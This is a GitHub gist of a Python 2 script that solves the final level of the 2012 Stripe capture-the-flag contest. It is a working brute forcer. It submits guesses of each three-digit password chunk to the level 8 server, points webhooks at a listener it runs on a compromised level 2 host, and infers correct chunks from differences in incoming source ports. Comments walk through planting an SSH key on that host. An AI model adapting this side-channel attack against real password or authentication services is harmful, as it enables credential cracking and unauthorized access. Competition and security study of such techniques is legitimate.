Created
August 29, 2012 21:22
-
-
Save 0xB4D1DEA/3519143 to your computer and use it in GitHub Desktop.
Stripe-CTF Level08 BruteForcer
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #http://www.stripe-ctf.com Capture the Flag level08(last level) | |
| import socket | |
| import threading | |
| import urllib | |
| import httplib | |
| import time | |
| global start | |
| global elapsed | |
| start = time.time() | |
| global level02Server | |
| global level08Server | |
| global userName | |
| #YOUR DATA GOES HERE<-------------------------------------------------------------------------------------- | |
| level02Server = "level02-4.stripe-ctf.com" #Put your level 02 server name here | |
| level08Server = "level08-1.stripe-ctf.com" #Put your level 08 server name here | |
| userName = "/user-curuypbgor/" #Put your level 08 /user-name/ here(note the "/"'s) | |
| PORT = 6111 #Pick an unused port, may need to guess and check for an open one | |
| #Upload this to your level02 server and run it with python filename.py | |
| #1) Create an ssh key pair for your level02 server by typing "ssh-keygen" | |
| #2) Hit enter a few times till the id_rsa.pub and id_rsa files are created | |
| #3) Upload the id_rsa.pub to your level02 server, renamed it to "authorized_keys", place it | |
| # in /home/user-abcdefhijk/.ssh (might need to make the .ssh directory) | |
| #4) run chmod 600 authorized_keys on your authorized_keys file | |
| #5) Upload this script to your level02 machine | |
| #6) Open up terminal/console and type ssh username@level02-4.stripe-ctf.com(use your level02 server) | |
| #6) Run this script and consider buying Armando/Kuskos/Zach/Ray lunch, over 20 hours went into this. | |
| #7) Enjoy your Stripe-ctf shirt | |
| #YOUR DATA GOES HERE<-------------------------------------------------------------------------------------- | |
| HOST = '' # Symbolic name meaning all available interfaces | |
| # Arbitrary non-privileged port | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| s.bind((HOST, PORT)) | |
| global chunk | |
| chunk = "000" | |
| global prevChunk | |
| prevChunk = "000" | |
| global beginList | |
| beginList = 0 | |
| global listOfResults | |
| listOfResults = [] | |
| global reTest | |
| reTest = 0 | |
| global integrity | |
| integrity = 0 | |
| global flag | |
| flag = "xxxxxxxxxxxx" | |
| global chunk1Solved | |
| global chunk2Solved | |
| global chunk3Solved | |
| global chunk4Solved | |
| chunk1Solved = "xxx" | |
| chunk2Solved = "xxx" | |
| chunk3Solved = "xxx" | |
| chunk4Solved = "xxx" | |
| global chunk1Boolean | |
| global chunk2Boolean | |
| global chunk3Boolean | |
| global chunk4Boolean | |
| chunk1Boolean = 0 | |
| chunk2Boolean = 0 | |
| chunk3Boolean = 0 | |
| chunk4Boolean = 0 | |
| global chunk1TrueDelta | |
| global chunk1FalseDelta | |
| chunk1TrueDelta = 3 | |
| chunk1FalseDelta = 2 | |
| global chunk2TrueDelta | |
| global chunk2FalseDelta | |
| chunk2TrueDelta = 4 | |
| chunk2FalseDelta = 3 | |
| global chunk3TrueDelta | |
| global chunk3FalseDelta | |
| chunk3TrueDelta = 5 | |
| chunk3FalseDelta = 4 | |
| global trueDelta | |
| global falseDelta | |
| trueDelta = 3 | |
| falseDelta = chunk1FalseDelta | |
| global currentChunk | |
| currentChunk = 1 | |
| global parseData | |
| global victory | |
| victory = "true" | |
| lock = threading.Lock() | |
| lock2 = threading.Lock() | |
| def getChunkNum(num): | |
| if num < 10: | |
| return "00" + str(num) | |
| elif num < 100: | |
| return "0" + str(num) | |
| else: | |
| return str(num) | |
| class listener(threading.Thread): | |
| def run(self): | |
| global chunk | |
| global prevChunk | |
| global beginList | |
| global listOfResults | |
| global reTest | |
| global elapsed | |
| global victory | |
| global integrity | |
| global parseData | |
| global trueDelta | |
| global falseDelta | |
| global currentChunk | |
| global chunk1Solved | |
| global chunk2Solved | |
| global chunk3Solved | |
| global chunk1TrueDelta | |
| global chunk1FalseDelta | |
| global chunk2TrueDelta | |
| global chunk2FalseDelta | |
| global chunk3TrueDelta | |
| global chunk3FalseDelta | |
| global level08Server | |
| global level02Server | |
| lastChunk = 0 | |
| while 1: | |
| lock.acquire() | |
| s.listen(1) | |
| conn, addr = s.accept() | |
| while 1: | |
| data = conn.recv(128) | |
| if not data: break | |
| parseData = data[107:111] | |
| #print data | |
| #print repr(data) #uncomment for demo | |
| if parseData == "fals" and currentChunk == 4: | |
| print '{"Success": "false"}' | |
| if parseData == "true": | |
| print '{"Success": "true"}' | |
| chunk = str(int(chunk) - 1) | |
| print 'Flag Found: '+ chunk1Solved + chunk2Solved + chunk3Solved + chunk | |
| elapsed = (time.time() - start) | |
| conn.close() | |
| print 'Solve time ~', elapsed, 'seconds, you mad bro? Like a boss.' | |
| print 'Sometimes a threading error occurs and the wrong chunk variable gets listed, double check in the above output for the tested password that returns true if your flag doesn't work' | |
| print 'Command+C to exit program.' | |
| while 1: | |
| chunk = chunk | |
| conn.sendall(data) | |
| conn.close() | |
| chunkPort = addr[1] | |
| diff = chunkPort - lastChunk | |
| #print 'Port', chunkPort #uncomment for demo | |
| #print 'Diff', diff #uncomment for demo | |
| lastChunk = chunkPort | |
| if currentChunk == 4: | |
| if parseData == "fals": | |
| print chunk1Solved + chunk2Solved + chunk3Solved + chunk.zfill(3) | |
| if diff == trueDelta and currentChunk != 4: #good chunk candidate | |
| listOfResults.append(chunk) | |
| listOfResults.append(prevChunk) | |
| chunk = prevChunk | |
| retest = 1 | |
| integrity = integrity + 1 | |
| print flag, ': Encountered as a possibly valid chunk ', integrity, 'times, retesting for confirmation.' | |
| if integrity == 10 and currentChunk == 1:#check condition for valid chunk1, move to chunk2 | |
| print '\nAccepting '+ chunk +' as candidate for Chunk 1, current flag estimated to be '+ chunk +'xxxxxxxxx.\n' | |
| chunk1Solved = chunk | |
| trueDelta = chunk2TrueDelta | |
| falseDelta = chunk2FalseDelta | |
| currentChunk = 2 | |
| integrity = 0 | |
| chunk = 0 | |
| if integrity == 10 and currentChunk == 2:#check condition for valid chunk2, move to chunk 3 | |
| print '\nAccepting '+ chunk +' as candidate for Chunk 2, current flag estimated to be '+ chunk1Solved + chunk +'xxxxxx.\n' | |
| chunk2Solved = chunk | |
| trueDelta = chunk3TrueDelta | |
| falseDelta = chunk3FalseDelta | |
| currentChunk = 3 | |
| integrity = 0 | |
| chunk = 0 | |
| if integrity == 10 and currentChunk == 3:#check condition for valid chunk3, move to full flag solution | |
| print '\nAccepting '+ chunk +' as candidate for Chunk 3, current flag estimated to be '+ chunk1Solved + chunk2Solved + chunk +'xxx.\n' | |
| chunk3Solved = chunk | |
| currentChunk = 4 | |
| integrity = 0 | |
| chunk = 0 | |
| elif diff != trueDelta and diff != falseDelta and currentChunk != 4:#falsed chunk candidate | |
| chunk = prevChunk | |
| reTest = 1 | |
| print flag, ': Inconclusive result, retesting.' | |
| elif diff == falseDelta and currentChunk != 4: #known false candidate | |
| integrity = 0 | |
| print flag, ': Ruled out as an invalid chunk.' | |
| if chunk == "999" and currentChunk != 4: | |
| beginList = 0 | |
| lock2.release() | |
| class sender(threading.Thread): | |
| def run(self): | |
| global chunk | |
| global chunk1Solved | |
| global prevChunk | |
| global beginList | |
| global listOfResults | |
| global reTest | |
| global flag | |
| global integrity | |
| global trueDelta | |
| global falseDeltai | |
| global level02Server | |
| global level08Server | |
| global userNamei | |
| global PORT | |
| sPort = str(PORT) | |
| while 1: | |
| lock2.acquire() | |
| #print "sending request" | |
| chunk = getChunkNum(int(chunk)) | |
| #print "trying password " + chunk | |
| if currentChunk == 1: | |
| flag = chunk + '000000000' | |
| params = '{"password": "'+ chunk +'000000000", "webhooks": ["'+ level02Server +':'+ sPort +'"]}' | |
| #print 'chunk 1 testing ', params | |
| if currentChunk == 2: | |
| flag = chunk1Solved + chunk + '000000' | |
| params = '{"password": "'+ chunk1Solved + chunk+'000000", "webhooks": ["'+ level02Server +':'+ sPort +'"]}' | |
| #print 'chunk 2 testing ', params | |
| if currentChunk == 3: | |
| flag = chunk1Solved + chunk2Solved + chunk + '000' | |
| params = '{"password": "'+ chunk1Solved + chunk2Solved + chunk+'000", "webhooks": ["'+ level02Server +':'+ sPort +'"]}' | |
| #print 'chunk 3 testing ', params | |
| if currentChunk == 4: | |
| flag = chunk1Solved + chunk2Solved + chunk3Solved + chunk.zfill(3) | |
| params = '{"password": "'+ chunk1Solved + chunk2Solved + chunk3Solved + chunk+'", "webhooks": ["'+ level02Server +':'+ sPort +'"]}' | |
| #print 'Final POST request: ', params | |
| headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"} | |
| conn = httplib.HTTPSConnection(level08Server) | |
| conn.request("POST", userName, params, headers) | |
| response = conn.getresponse() | |
| data = response.read() | |
| conn.close() | |
| if beginList == 0: | |
| prevChunk = chunk | |
| chunk = str(int(chunk) + 1) | |
| else: | |
| if reTest == 0: | |
| prevChunk = listOfResults.pop() | |
| chunk = listOfResults.pop() | |
| integrity = 0 | |
| reTest = 0 | |
| lock.release() | |
| try: | |
| t = listener() | |
| y = sender() | |
| t.daemon=True | |
| y.daemon=True | |
| t.start() | |
| y.start() | |
| while True: | |
| time.sleep(100) | |
| except(KeyboardInterrupt, SystemExit): | |
| print '\n Application Terminated!.\n' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment